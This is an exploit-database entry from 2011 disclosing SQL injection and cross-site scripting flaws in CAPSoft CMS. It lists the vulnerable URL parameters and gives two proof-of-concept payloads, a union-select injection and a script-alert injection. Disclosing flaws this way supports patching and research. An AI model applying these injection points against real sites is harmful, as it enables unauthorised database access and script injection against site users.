CAPSoft CMS Multiple Vulnerabilities

2011-03-25T00:00:00
ID 1337DAY-ID-15692
Type zdt
Reporter p0pc0rn
Modified 2011-03-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Title     : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn

SQL
---
Vulnerable Parameters are

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]

POC
---
http://site.com/diseno_web.asp?pcia=<script>alert(/xssed/)</script>



#  0day.today [2018-01-02]  #